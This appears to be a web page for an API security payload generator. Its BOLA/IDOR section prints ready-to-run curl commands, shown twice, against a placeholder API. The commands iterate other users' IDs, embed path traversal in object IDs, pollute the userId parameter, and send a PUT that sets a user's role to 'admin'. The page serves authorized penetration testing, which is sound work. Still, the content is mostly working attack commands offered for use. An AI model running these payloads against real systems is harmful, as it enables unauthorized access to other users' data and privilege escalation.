Also available inAPI Security Studio →— OAuth & GraphQL testing in one place.

API Security Testing Hub

Generate ready-to-run test payloads for OWASP API Top 10 vulnerabilities. Covers BOLA, BFLA, mass assignment, auth bypass, and injection attacks.

Target Configuration

API Base URL

Auth Token (optional)

Your User / Object ID

Your Attacker IP

Content-Type

5 sectionsBOLA / IDOR

# Test horizontal IDOR — access another user's resource by iterating IDs:
for i in $(seq 1 20); do
  echo -n "ID $i: "
  curl -s -o /dev/null -w "%{http_code}" \
    -H "Authorization: Bearer YOUR_TOKEN" \
    "https://api.target.com/v1/users/$i"
  echo
done

# Test UUID-based IDOR with predictable UUIDs:
curl -H "Authorization: Bearer YOUR_TOKEN" "https://api.target.com/v1/users/00000000-0000-0000-0000-000000000001"
curl -H "Authorization: Bearer YOUR_TOKEN" "https://api.target.com/v1/users/00000000-0000-0000-0000-000000000002"

# Test indirect references — your ID used in other object types:
curl -H "Authorization: Bearer YOUR_TOKEN" "https://api.target.com/v1/orders/USER_ID"
curl -H "Authorization: Bearer YOUR_TOKEN" "https://api.target.com/v1/invoices/USER_ID"
curl -H "Authorization: Bearer YOUR_TOKEN" "https://api.target.com/v1/documents/USER_ID"

# Test path traversal embedded in object IDs:
curl -H "Authorization: Bearer YOUR_TOKEN" "https://api.target.com/v1/users/USER_ID/../admin"
curl -H "Authorization: Bearer YOUR_TOKEN" "https://api.target.com/v1/users/1%2F..%2F2"

# HTTP parameter pollution — send userId twice:
curl -H "Authorization: Bearer YOUR_TOKEN" "https://api.target.com/v1/profile?userId=USER_ID&userId=1"
curl -H "Authorization: Bearer YOUR_TOKEN" \
  -d '{"userId":"USER_ID","targetId":1}' \
  -H "Content-Type: application/json" \
  "https://api.target.com/v1/data"

# JSON body ID tampering — try to overwrite to another user's ID:
curl -X PUT "https://api.target.com/v1/users/USER_ID" \
  -H "Authorization: Bearer YOUR_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"id": 1, "role": "admin", "email": "[email protected]"}'

$loading...

# Test horizontal IDOR — access another user's resource by iterating IDs: for i in $(seq 1 20); do echo -n "ID $i: " curl -s -o /dev/null -w "%{http_code}" \ -H "Authorization: Bearer YOUR_TOKEN" \ "https://api.target.com/v1/users/$i" echo done

# Test UUID-based IDOR with predictable UUIDs: curl -H "Authorization: Bearer YOUR_TOKEN" "https://api.target.com/v1/users/00000000-0000-0000-0000-000000000001" curl -H "Authorization: Bearer YOUR_TOKEN" "https://api.target.com/v1/users/00000000-0000-0000-0000-000000000002"

# Test indirect references — your ID used in other object types: curl -H "Authorization: Bearer YOUR_TOKEN" "https://api.target.com/v1/orders/USER_ID" curl -H "Authorization: Bearer YOUR_TOKEN" "https://api.target.com/v1/invoices/USER_ID" curl -H "Authorization: Bearer YOUR_TOKEN" "https://api.target.com/v1/documents/USER_ID"

# Test path traversal embedded in object IDs: curl -H "Authorization: Bearer YOUR_TOKEN" "https://api.target.com/v1/users/USER_ID/../admin" curl -H "Authorization: Bearer YOUR_TOKEN" "https://api.target.com/v1/users/1%2F..%2F2"

# HTTP parameter pollution — send userId twice: curl -H "Authorization: Bearer YOUR_TOKEN" "https://api.target.com/v1/profile?userId=USER_ID&userId=1" curl -H "Authorization: Bearer YOUR_TOKEN" \ -d '{"userId":"USER_ID","targetId":1}' \ -H "Content-Type: application/json" \ "https://api.target.com/v1/data" # JSON body ID tampering — try to overwrite to another user's ID: curl -X PUT "https://api.target.com/v1/users/USER_ID" \ -H "Authorization: Bearer YOUR_TOKEN" \ -H "Content-Type: application/json" \ -d '{"id": 1, "role": "admin", "email": "[email protected]"}'